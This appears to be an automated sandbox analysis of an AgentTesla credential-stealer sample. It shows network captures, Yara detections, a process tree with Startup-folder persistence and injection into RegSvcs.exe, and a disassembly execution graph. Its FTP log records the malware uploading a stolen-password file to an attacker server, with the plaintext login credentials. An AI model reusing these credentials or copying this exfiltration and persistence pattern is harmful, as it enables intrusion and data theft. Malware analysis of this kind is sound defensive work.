                                  Jan 10, 2025 17:51:38.776519060 CET4370449712162.241.62.63192.168.2.8
                                  Jan 10, 2025 17:51:38.776849031 CET4370449712162.241.62.63192.168.2.8
                                  Jan 10, 2025 17:51:38.778605938 CET4971243704192.168.2.8162.241.62.63
                                  Jan 10, 2025 17:51:38.817692041 CET4971121192.168.2.8162.241.62.63
                                  Jan 10, 2025 17:51:38.902590990 CET2149711162.241.62.63192.168.2.8
                                  Jan 10, 2025 17:51:38.957304001 CET4971121192.168.2.8162.241.62.63
                                  Jan 10, 2025 17:51:55.902669907 CET6524053192.168.2.8162.159.36.2
                                  Jan 10, 2025 17:51:55.907650948 CET5365240162.159.36.2192.168.2.8
                                  Jan 10, 2025 17:51:55.907727003 CET6524053192.168.2.8162.159.36.2
                                  Jan 10, 2025 17:51:55.912623882 CET5365240162.159.36.2192.168.2.8
                                  Jan 10, 2025 17:51:56.380001068 CET6524053192.168.2.8162.159.36.2
                                  Jan 10, 2025 17:51:56.385041952 CET5365240162.159.36.2192.168.2.8
                                  Jan 10, 2025 17:51:56.385108948 CET6524053192.168.2.8162.159.36.2
                                  Jan 10, 2025 17:52:26.832586050 CET4971080192.168.2.8208.95.112.1
                                  Jan 10, 2025 17:52:26.837745905 CET8049710208.95.112.1192.168.2.8
                                  Jan 10, 2025 17:52:26.839615107 CET4971080192.168.2.8208.95.112.1

                                  UDP Packets

                                  TimestampSource PortDest PortSource IPDest IP
                                  Jan 10, 2025 17:51:24.164252996 CET5490253192.168.2.81.1.1.1
                                  Jan 10, 2025 17:51:24.172296047 CET53549021.1.1.1192.168.2.8
                                  Jan 10, 2025 17:51:27.784645081 CET6154453192.168.2.81.1.1.1
                                  Jan 10, 2025 17:51:28.100369930 CET53615441.1.1.1192.168.2.8
                                  Jan 10, 2025 17:51:55.902096987 CET5354512162.159.36.2192.168.2.8
                                  Jan 10, 2025 17:51:56.407669067 CET53634331.1.1.1192.168.2.8

                                  DNS Queries

                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                  Jan 10, 2025 17:51:24.164252996 CET192.168.2.81.1.1.10x90b1Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                  Jan 10, 2025 17:51:27.784645081 CET192.168.2.81.1.1.10x3950Standard query (0)ftp.antoniomayol.comA (IP address)IN (0x0001)false

                                  DNS Answers

                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                  Jan 10, 2025 17:51:24.172296047 CET1.1.1.1192.168.2.80x90b1No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                  Jan 10, 2025 17:51:28.100369930 CET1.1.1.1192.168.2.80x3950No error (0)ftp.antoniomayol.comantoniomayol.comCNAME (Canonical name)IN (0x0001)false
                                  Jan 10, 2025 17:51:28.100369930 CET1.1.1.1192.168.2.80x3950No error (0)antoniomayol.com162.241.62.63A (IP address)IN (0x0001)false

                                  HTTP Request Dependency Graph

                                  • ip-api.com

                                  HTTP Packets

                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  0192.168.2.849704208.95.112.1801712C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                  TimestampBytes transferredDirectionData
                                  Jan 10, 2025 17:51:24.245347023 CET80OUTGET /line/?fields=hosting HTTP/1.1
                                  Host: ip-api.com
                                  Connection: Keep-Alive
                                  Jan 10, 2025 17:51:24.753062010 CET175INHTTP/1.1 200 OK
                                  Date: Fri, 10 Jan 2025 16:51:24 GMT
                                  Content-Type: text/plain; charset=utf-8
                                  Content-Length: 6
                                  Access-Control-Allow-Origin: *
                                  X-Ttl: 60
                                  X-Rl: 44
                                  Data Raw: 66 61 6c 73 65 0a
                                  Data Ascii: false


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  1192.168.2.849710208.95.112.1806796C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                  TimestampBytes transferredDirectionData
                                  Jan 10, 2025 17:51:35.442747116 CET80OUTGET /line/?fields=hosting HTTP/1.1
                                  Host: ip-api.com
                                  Connection: Keep-Alive
                                  Jan 10, 2025 17:51:35.916877031 CET175INHTTP/1.1 200 OK
                                  Date: Fri, 10 Jan 2025 16:51:35 GMT
                                  Content-Type: text/plain; charset=utf-8
                                  Content-Length: 6
                                  Access-Control-Allow-Origin: *
                                  X-Ttl: 48
                                  X-Rl: 43
                                  Data Raw: 66 61 6c 73 65 0a
                                  Data Ascii: false


                                  FTP Packets

                                  TimestampSource PortDest PortSource IPDest IPCommands
                                  Jan 10, 2025 17:51:37.368268013 CET2149711162.241.62.63192.168.2.8220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 9 of 150 allowed.
                                  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 9 of 150 allowed.220-Local time is now 10:51. Server port: 21.
                                  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 9 of 150 allowed.220-Local time is now 10:51. Server port: 21.220-IPv6 connections are also welcome on this server.
                                  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 9 of 150 allowed.220-Local time is now 10:51. Server port: 21.220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                                  Jan 10, 2025 17:51:37.368504047 CET4971121192.168.2.8162.241.62.63USER johnson@antoniomayol.com
                                  Jan 10, 2025 17:51:37.680449009 CET2149711162.241.62.63192.168.2.8331 User johnson@antoniomayol.com OK. Password required
                                  Jan 10, 2025 17:51:37.680736065 CET4971121192.168.2.8162.241.62.63PASS cMhKDQUk1{;%
                                  Jan 10, 2025 17:51:37.898473024 CET2149711162.241.62.63192.168.2.8230-OK. Current restricted directory is /
                                  230-OK. Current restricted directory is /230 16 Kbytes used (0%) - authorized: 2048000 Kb
                                  Jan 10, 2025 17:51:38.013902903 CET2149711162.241.62.63192.168.2.8504 Unknown command
                                  Jan 10, 2025 17:51:38.014071941 CET4971121192.168.2.8162.241.62.63PWD
                                  Jan 10, 2025 17:51:38.130022049 CET2149711162.241.62.63192.168.2.8257 "/" is your current location
                                  Jan 10, 2025 17:51:38.130220890 CET4971121192.168.2.8162.241.62.63TYPE I
                                  Jan 10, 2025 17:51:38.245302916 CET2149711162.241.62.63192.168.2.8200 TYPE is now 8-bit binary
                                  Jan 10, 2025 17:51:38.245445013 CET4971121192.168.2.8162.241.62.63PASV
                                  Jan 10, 2025 17:51:38.369242907 CET2149711162.241.62.63192.168.2.8227 Entering Passive Mode (162,241,62,63,170,184)
                                  Jan 10, 2025 17:51:38.374886036 CET4971121192.168.2.8162.241.62.63STOR PW_user-760639_2025_01_10_11_51_36.html
                                  Jan 10, 2025 17:51:38.771456957 CET2149711162.241.62.63192.168.2.8150 Accepted data connection
                                  Jan 10, 2025 17:51:38.902590990 CET2149711162.241.62.63192.168.2.8226-16 Kbytes used (0%) - authorized: 2048000 Kb
                                  226-16 Kbytes used (0%) - authorized: 2048000 Kb226-File successfully transferred
                                  226-16 Kbytes used (0%) - authorized: 2048000 Kb226-File successfully transferred226 0.117 seconds (measured here), 2.68 Kbytes per second

                                  Statistics

                                  CPU Usage

                                  Click to jump to process

                                  Memory Usage

                                  Click to jump to process

                                  High Level Behavior Distribution

                                  Click to dive into process behavior distribution

                                  Behavior

                                  Click to jump to process

                                  System Behavior

                                  General

                                  Target ID:1
                                  Start time:11:51:18
                                  Start date:10/01/2025
                                  Path:C:\Users\user\Desktop\XoRPyi5s1i.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\Desktop\XoRPyi5s1i.exe"
                                  Imagebase:0x130000
                                  File size:550'912 bytes
                                  MD5 hash:FC76D8B178C0AA094EBA5FEA74E82614
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:low
                                  Has exited:true

                                  General

                                  Target ID:2
                                  Start time:11:51:20
                                  Start date:10/01/2025
                                  Path:C:\Users\user\AppData\Local\Lityerses\unjuridically.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\Desktop\XoRPyi5s1i.exe"
                                  Imagebase:0xfd0000
                                  File size:550'912 bytes
                                  MD5 hash:FC76D8B178C0AA094EBA5FEA74E82614
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.1635227729.0000000000F60000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000002.00000002.1635227729.0000000000F60000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.1635227729.0000000000F60000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: 00000002.00000002.1635227729.0000000000F60000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                  • Rule: MALWARE_Win_AgentTeslaV2, Description: AgenetTesla Type 2 Keylogger payload, Source: 00000002.00000002.1635227729.0000000000F60000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                  Antivirus matches:
                                  • Detection: 100%, Joe Sandbox ML
                                  • Detection: 63%, ReversingLabs
                                  Reputation:low
                                  Has exited:true

                                  General

                                  Target ID:3
                                  Start time:11:51:22
                                  Start date:10/01/2025
                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\Desktop\XoRPyi5s1i.exe"
                                  Imagebase:0x250000
                                  File size:45'984 bytes
                                  MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.1759111778.000000000264E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.1759111778.0000000002621000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.1759111778.0000000002621000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.1755639196.0000000000622000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.1755639196.0000000000622000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                  Reputation:high
                                  Has exited:true

                                  General

                                  Target ID:5
                                  Start time:11:51:32
                                  Start date:10/01/2025
                                  Path:C:\Windows\System32\wscript.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\unjuridically.vbs"
                                  Imagebase:0x7ff646e40000
                                  File size:170'496 bytes
                                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  General

                                  Target ID:6
                                  Start time:11:51:33
                                  Start date:10/01/2025
                                  Path:C:\Users\user\AppData\Local\Lityerses\unjuridically.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\AppData\Local\Lityerses\unjuridically.exe"
                                  Imagebase:0xfd0000
                                  File size:550'912 bytes
                                  MD5 hash:FC76D8B178C0AA094EBA5FEA74E82614
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.1757155715.0000000001190000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000006.00000002.1757155715.0000000001190000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.1757155715.0000000001190000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: 00000006.00000002.1757155715.0000000001190000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                  • Rule: MALWARE_Win_AgentTeslaV2, Description: AgenetTesla Type 2 Keylogger payload, Source: 00000006.00000002.1757155715.0000000001190000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                  Reputation:low
                                  Has exited:true

                                  General

                                  Target ID:7
                                  Start time:11:51:34
                                  Start date:10/01/2025
                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\AppData\Local\Lityerses\unjuridically.exe"
                                  Imagebase:0xd90000
                                  File size:45'984 bytes
                                  MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.2847350109.00000000031AE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.2847350109.0000000003181000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.2847350109.0000000003181000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  Reputation:high
                                  Has exited:false

                                  Disassembly

                                  Reset < >

                                    Execution Graph

                                    Execution Coverage:3.8%
                                    Dynamic/Decrypted Code Coverage:0.4%
                                    Signature Coverage:6.9%
                                    Total number of Nodes:2000
                                    Total number of Limit Nodes:53
                                    execution_graph 94727 1a19ba 94732 14c75a 94727->94732 94731 1a19c9 94740 13d7f7 94732->94740 94736 14c865 94738 14c881 94736->94738 94748 14d1fa 48 API calls _memcpy_s 94736->94748 94739 150f0a 52 API calls __cinit 94738->94739 94739->94731 94749 14f4ea 94740->94749 94742 13d818 94743 14f4ea 48 API calls 94742->94743 94744 13d826 94743->94744 94745 14d26c 94744->94745 94780 14d298 94745->94780 94748->94736 94751 14f4f2 __calloc_impl 94749->94751 94752 14f50c 94751->94752 94753 14f50e std::exception::exception 94751->94753 94758 15395c 94751->94758 94752->94742 94772 156805 RaiseException 94753->94772 94755 14f538 94773 15673b 47 API calls _free 94755->94773 94757 14f54a 94757->94742 94759 1539d7 __calloc_impl 94758->94759 94762 153968 __calloc_impl 94758->94762 94779 157c0e 47 API calls __getptd_noexit 94759->94779 94760 153973 94760->94762 94774 1581c2 47 API calls 2 library calls 94760->94774 94775 15821f 47 API calls 7 library calls 94760->94775 94776 151145 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 94760->94776 94762->94760 94764 15399b RtlAllocateHeap 94762->94764 94767 1539c3 94762->94767 94770 1539c1 94762->94770 94764->94762 94765 1539cf 94764->94765 94765->94751 94777 157c0e 47 API calls __getptd_noexit 94767->94777 94778 157c0e 47 API calls __getptd_noexit 94770->94778 94772->94755 94773->94757 94774->94760 94775->94760 94777->94770 94778->94765 94779->94765 94781 14d28b 94780->94781 94782 14d2a5 94780->94782 94781->94736 94782->94781 94783 14d2ac RegOpenKeyExW 94782->94783 94783->94781 94784 14d2c6 RegQueryValueExW 94783->94784 94785 14d2e7 94784->94785 94786 14d2fc RegCloseKey 94784->94786 94785->94786 94786->94781 94787 133742 94788 13374b 94787->94788 94789 133769 94788->94789 94790 1337c8 94788->94790 94827 1337c6 94788->94827 94794 133776 94789->94794 94795 13382c PostQuitMessage 94789->94795 94792 1a1e00 94790->94792 94793 1337ce 94790->94793 94791 1337ab NtdllDefWindowProc_W 94829 1337b9 94791->94829 94836 132ff6 16 API calls 94792->94836 94796 1337d3 94793->94796 94797 1337f6 SetTimer RegisterClipboardFormatW 94793->94797 94799 1a1e88 94794->94799 94800 133781 94794->94800 94795->94829 94801 1a1da3 94796->94801 94802 1337da KillTimer 94796->94802 94804 13381f CreatePopupMenu 94797->94804 94797->94829 94851 174ddd 60 API calls _memset 94799->94851 94805 133836 94800->94805 94806 133789 94800->94806 94808 1a1da8 94801->94808 94809 1a1ddc MoveWindow 94801->94809 94832 133847 Shell_NotifyIconW _memset 94802->94832 94803 1a1e27 94837 14e312 331 API calls Mailbox 94803->94837 94804->94829 94834 14eb83 53 API calls _memset 94805->94834 94812 1a1e6d 94806->94812 94813 133794 94806->94813 94816 1a1dcb SetFocus 94808->94816 94817 1a1dac 94808->94817 94809->94829 94812->94791 94850 16a5f3 48 API calls 94812->94850 94819 1a1e58 94813->94819 94824 13379f 94813->94824 94814 1a1e9a 94814->94791 94814->94829 94816->94829 94820 1a1db5 94817->94820 94817->94824 94818 1337ed 94833 13390f DeleteObject DestroyWindow Mailbox 94818->94833 94849 1755bd 70 API calls _memset 94819->94849 94835 132ff6 16 API calls 94820->94835 94824->94791 94838 133847 Shell_NotifyIconW _memset 94824->94838 94826 133845 94826->94829 94827->94791 94830 1a1e4c 94839 134ffc 94830->94839 94832->94818 94833->94829 94834->94826 94835->94829 94836->94803 94837->94824 94838->94830 94840 135027 _memset 94839->94840 94852 134c30 94840->94852 94843 1350ac 94845 1a3d28 Shell_NotifyIconW 94843->94845 94846 1350ca Shell_NotifyIconW 94843->94846 94856 1351af 94846->94856 94848 1350df 94848->94827 94849->94826 94850->94827 94851->94814 94853 134c44 94852->94853 94854 1a3c33 94852->94854 94853->94843 94878 175819 61 API calls _W_store_winword 94853->94878 94854->94853 94855 1a3c3c DestroyCursor 94854->94855 94855->94853 94857 1351cb 94856->94857 94877 1352a2 Mailbox 94856->94877 94879 136b0f 94857->94879 94860 1351e6 94884 136a63 94860->94884 94861 1a3ca1 LoadStringW 94863 1a3cbb 94861->94863 94900 13510d 48 API calls Mailbox 94863->94900 94864 1351fb 94864->94863 94866 13520c 94864->94866 94867 1352a7 94866->94867 94868 135216 94866->94868 94896 136eed 94867->94896 94895 13510d 48 API calls Mailbox 94868->94895 94871 1a3cc5 94873 135220 _memset _wcscpy 94871->94873 94901 13518c 94871->94901 94875 135288 Shell_NotifyIconW 94873->94875 94874 1a3ce7 94876 13518c 48 API calls 94874->94876 94875->94877 94876->94873 94877->94848 94878->94843 94880 14f4ea 48 API calls 94879->94880 94881 136b34 94880->94881 94911 136b4a 94881->94911 94885 136adf 94884->94885 94887 136a6f __wsetenvp 94884->94887 94924 13b18b 94885->94924 94888 136ad7 94887->94888 94889 136a8b 94887->94889 94923 13c369 48 API calls 94888->94923 94891 136b4a 48 API calls 94889->94891 94892 136a95 94891->94892 94914 14ee75 94892->94914 94893 136ab6 _memcpy_s 94893->94864 94895->94873 94897 136f00 94896->94897 94898 136ef8 94896->94898 94897->94873 94936 13dd47 48 API calls _memcpy_s 94898->94936 94900->94871 94902 135197 94901->94902 94903 1a1ace 94902->94903 94904 13519f 94902->94904 94906 136b4a 48 API calls 94903->94906 94937 135130 94904->94937 94908 1a1adb __wsetenvp 94906->94908 94907 1351aa 94907->94874 94909 14ee75 48 API calls 94908->94909 94910 1a1b07 _memcpy_s 94909->94910 94912 14f4ea 48 API calls 94911->94912 94913 1351d9 94912->94913 94913->94860 94913->94861 94915 14f4ea __calloc_impl 94914->94915 94916 15395c __malloc_crt 47 API calls 94915->94916 94917 14f50c 94915->94917 94918 14f50e std::exception::exception 94915->94918 94916->94915 94917->94893 94928 156805 RaiseException 94918->94928 94920 14f538 94929 15673b 47 API calls _free 94920->94929 94922 14f54a 94922->94893 94923->94893 94925 13b1a2 _memcpy_s 94924->94925 94926 13b199 94924->94926 94925->94893 94926->94925 94930 13bdfa 94926->94930 94928->94920 94929->94922 94931 13be0d 94930->94931 94935 13be0a _memcpy_s 94930->94935 94932 14f4ea 48 API calls 94931->94932 94933 13be17 94932->94933 94934 14ee75 48 API calls 94933->94934 94934->94935 94935->94925 94936->94897 94938 13513f __wsetenvp 94937->94938 94939 135151 94938->94939 94940 1a1b27 94938->94940 94947 13bb85 94939->94947 94942 136b4a 48 API calls 94940->94942 94944 1a1b34 94942->94944 94943 13515e _memcpy_s 94943->94907 94945 14ee75 48 API calls 94944->94945 94946 1a1b57 _memcpy_s 94945->94946 94948 13bb9b 94947->94948 94951 13bb96 _memcpy_s 94947->94951 94949 14ee75 48 API calls 94948->94949 94950 1a1b77 94948->94950 94949->94951 94951->94943 94952 1a197b 94957 14dd94 94952->94957 94956 1a198a 94958 14f4ea 48 API calls 94957->94958 94959 14dd9c 94958->94959 94960 14ddb0 94959->94960 94965 14df3d 94959->94965 94964 150f0a 52 API calls __cinit 94960->94964 94964->94956 94966 14df46 94965->94966 94968 14dda8 94965->94968 94997 150f0a 52 API calls __cinit 94966->94997 94969 14ddc0 94968->94969 94970 13d7f7 48 API calls 94969->94970 94971 14ddd7 GetVersionExW 94970->94971 94972 136a63 48 API calls 94971->94972 94973 14de1a 94972->94973 94998 14dfb4 94973->94998 94979 1a24c8 94981 14dea4 GetCurrentProcess 95015 14df5f LoadLibraryA GetProcAddress 94981->95015 94983 14df31 GetSystemInfo 94985 14df0e 94983->94985 94984 14dee3 95009 14e00c 94984->95009 94987 14df21 94985->94987 94988 14df1c FreeLibrary 94985->94988 94987->94960 94988->94987 94990 14debb 94990->94983 94990->94984 94991 14df29 GetSystemInfo 94993 14df03 94991->94993 94992 14def9 95012 14dff4 94992->95012 94993->94985 94996 14df09 FreeLibrary 94993->94996 94996->94985 94997->94968 94999 14dfbd 94998->94999 95000 13b18b 48 API calls 94999->95000 95001 14de22 95000->95001 95002 136571 95001->95002 95003 13657f 95002->95003 95004 13b18b 48 API calls 95003->95004 95005 13658f 95004->95005 95005->94979 95006 14df77 95005->95006 95016 14df89 95006->95016 95020 14e01e 95009->95020 95013 14e00c 2 API calls 95012->95013 95014 14df01 GetNativeSystemInfo 95013->95014 95014->94993 95015->94990 95017 14dea0 95016->95017 95018 14df92 LoadLibraryA 95016->95018 95017->94981 95017->94990 95018->95017 95019 14dfa3 GetProcAddress 95018->95019 95019->95017 95021 14def1 95020->95021 95022 14e027 LoadLibraryA 95020->95022 95021->94991 95021->94992 95022->95021 95023 14e038 GetProcAddress 95022->95023 95023->95021 95024 1a19cb 95029 132322 95024->95029 95026 1a19d1 95062 150f0a 52 API calls __cinit 95026->95062 95028 1a19db 95030 132344 95029->95030 95063 1326df 95030->95063 95035 13d7f7 48 API calls 95036 132384 95035->95036 95037 13d7f7 48 API calls 95036->95037 95038 13238e 95037->95038 95039 13d7f7 48 API calls 95038->95039 95040 132398 95039->95040 95041 13d7f7 48 API calls 95040->95041 95042 1323de 95041->95042 95043 13d7f7 48 API calls 95042->95043 95044 1324c1 95043->95044 95071 13263f 95044->95071 95048 1324f1 95049 13d7f7 48 API calls 95048->95049 95050 1324fb 95049->95050 95100 132745 95050->95100 95052 132546 95053 132556 GetStdHandle 95052->95053 95054 1325b1 95053->95054 95055 1a501d 95053->95055 95057 1325b7 CoInitialize 95054->95057 95055->95054 95056 1a5026 95055->95056 95107 1792d4 53 API calls 95056->95107 95057->95026 95059 1a502d 95108 1799f9 CreateThread 95059->95108 95061 1a5039 CloseHandle 95061->95057 95062->95028 95109 132854 95063->95109 95066 136a63 48 API calls 95067 13234a 95066->95067 95068 13272e 95067->95068 95123 1327ec 6 API calls 95068->95123 95070 13237a 95070->95035 95072 13d7f7 48 API calls 95071->95072 95073 13264f 95072->95073 95074 13d7f7 48 API calls 95073->95074 95075 132657 95074->95075 95124 1326a7 95075->95124 95078 1326a7 48 API calls 95079 132667 95078->95079 95080 13d7f7 48 API calls 95079->95080 95081 132672 95080->95081 95082 14f4ea 48 API calls 95081->95082 95083 1324cb 95082->95083 95084 1322a4 95083->95084 95085 1322b2 95084->95085 95086 13d7f7 48 API calls 95085->95086 95087 1322bd 95086->95087 95088 13d7f7 48 API calls 95087->95088 95089 1322c8 95088->95089 95090 13d7f7 48 API calls 95089->95090 95091 1322d3 95090->95091 95092 13d7f7 48 API calls 95091->95092 95093 1322de 95092->95093 95094 1326a7 48 API calls 95093->95094 95095 1322e9 95094->95095 95096 14f4ea 48 API calls 95095->95096 95097 1322f0 95096->95097 95098 1322f9 RegisterClipboardFormatW 95097->95098 95099 1a1fe7 95097->95099 95098->95048 95101 132755 95100->95101 95102 1a5f4d 95100->95102 95103 14f4ea 48 API calls 95101->95103 95129 17c942 50 API calls 95102->95129 95105 13275d 95103->95105 95105->95052 95106 1a5f58 95107->95059 95108->95061 95130 1799df 54 API calls 95108->95130 95116 132870 95109->95116 95112 132870 48 API calls 95113 132864 95112->95113 95114 13d7f7 48 API calls 95113->95114 95115 132716 95114->95115 95115->95066 95117 13d7f7 48 API calls 95116->95117 95118 13287b 95117->95118 95119 13d7f7 48 API calls 95118->95119 95120 132883 95119->95120 95121 13d7f7 48 API calls 95120->95121 95122 13285c 95121->95122 95122->95112 95123->95070 95125 13d7f7 48 API calls 95124->95125 95126 1326b0 95125->95126 95127 13d7f7 48 API calls 95126->95127 95128 13265f 95127->95128 95128->95078 95129->95106 95131 13f030 95134 143b70 95131->95134 95133 13f03c 95135 143bc8 95134->95135 95188 1442a5 95134->95188 95136 143bef 95135->95136 95138 1a6fd1 95135->95138 95140 1a6f7e 95135->95140 95147 1a6f9b 95135->95147 95137 14f4ea 48 API calls 95136->95137 95139 143c18 95137->95139 95242 18ceca 331 API calls Mailbox 95138->95242 95143 14f4ea 48 API calls 95139->95143 95140->95136 95144 1a6f87 95140->95144 95142 1a6fbe 95241 17cc5c 86 API calls 4 library calls 95142->95241 95196 143c2c _memcpy_s __wsetenvp 95143->95196 95239 18d552 331 API calls Mailbox 95144->95239 95147->95142 95240 18da0e 331 API calls 2 library calls 95147->95240 95149 1442f2 95261 17cc5c 86 API calls 4 library calls 95149->95261 95151 1a73b0 95151->95133 95152 1a737a 95260 17cc5c 86 API calls 4 library calls 95152->95260 95153 1a7297 95250 17cc5c 86 API calls 4 library calls 95153->95250 95158 14dce0 53 API calls 95158->95196 95159 1440df 95251 17cc5c 86 API calls 4 library calls 95159->95251 95161 1a707e 95243 17cc5c 86 API calls 4 library calls 95161->95243 95165 143f2b 95165->95133 95166 13d645 53 API calls 95166->95196 95169 1a72d2 95252 17cc5c 86 API calls 4 library calls 95169->95252 95170 13fe30 331 API calls 95170->95196 95172 1a7350 95258 17cc5c 86 API calls 4 library calls 95172->95258 95174 1a7363 95259 17cc5c 86 API calls 4 library calls 95174->95259 95176 1a72e9 95253 17cc5c 86 API calls 4 library calls 95176->95253 95179 136a63 48 API calls 95179->95196 95181 1a714c 95247 18ccdc 48 API calls 95181->95247 95184 1a733f 95257 17cc5c 86 API calls 4 library calls 95184->95257 95186 13d286 48 API calls 95186->95196 95254 17cc5c 86 API calls 4 library calls 95188->95254 95189 136eed 48 API calls 95189->95196 95190 1a71a1 95249 14c15c 48 API calls 95190->95249 95193 14ee75 48 API calls 95193->95196 95194 1a71e1 95194->95165 95256 17cc5c 86 API calls 4 library calls 95194->95256 95196->95149 95196->95152 95196->95153 95196->95158 95196->95159 95196->95161 95196->95165 95196->95166 95196->95169 95196->95170 95196->95172 95196->95174 95196->95176 95196->95179 95196->95181 95196->95184 95196->95186 95196->95188 95196->95189 95196->95193 95196->95194 95203 14f4ea 48 API calls 95196->95203 95206 13d9a0 53 API calls __cinit 95196->95206 95207 13d83d 53 API calls 95196->95207 95208 13cdb9 95196->95208 95222 13d6e9 95196->95222 95226 14c15c 48 API calls 95196->95226 95227 14c050 95196->95227 95238 14becb 331 API calls 95196->95238 95244 13dcae 50 API calls Mailbox 95196->95244 95245 18ccdc 48 API calls 95196->95245 95246 17a1eb 50 API calls 95196->95246 95197 1a715f 95197->95190 95248 18ccdc 48 API calls 95197->95248 95199 1a71ce 95200 14c050 48 API calls 95199->95200 95202 1a71d6 95200->95202 95201 1a71ab 95201->95188 95201->95199 95202->95194 95204 1a7313 95202->95204 95203->95196 95255 17cc5c 86 API calls 4 library calls 95204->95255 95206->95196 95207->95196 95209 13cdc5 95208->95209 95210 13cdfb 95208->95210 95215 14f4ea 48 API calls 95209->95215 95211 13ce04 95210->95211 95212 13ce0e 95210->95212 95213 136a63 48 API calls 95211->95213 95268 13bcce 95212->95268 95219 13cdf1 95213->95219 95216 13cdd8 95215->95216 95217 13cde3 95216->95217 95218 1a4621 95216->95218 95217->95219 95262 13ce19 95217->95262 95218->95219 95220 13d7f7 48 API calls 95218->95220 95219->95196 95220->95219 95223 13d6f4 95222->95223 95224 13d71b 95223->95224 95274 13d764 55 API calls 95223->95274 95224->95196 95226->95196 95228 14c064 95227->95228 95230 14c069 Mailbox 95227->95230 95275 14c1af 48 API calls 95228->95275 95236 14c077 95230->95236 95276 14c15c 48 API calls 95230->95276 95232 14f4ea 48 API calls 95233 14c108 95232->95233 95235 14f4ea 48 API calls 95233->95235 95234 14c152 95234->95196 95237 14c113 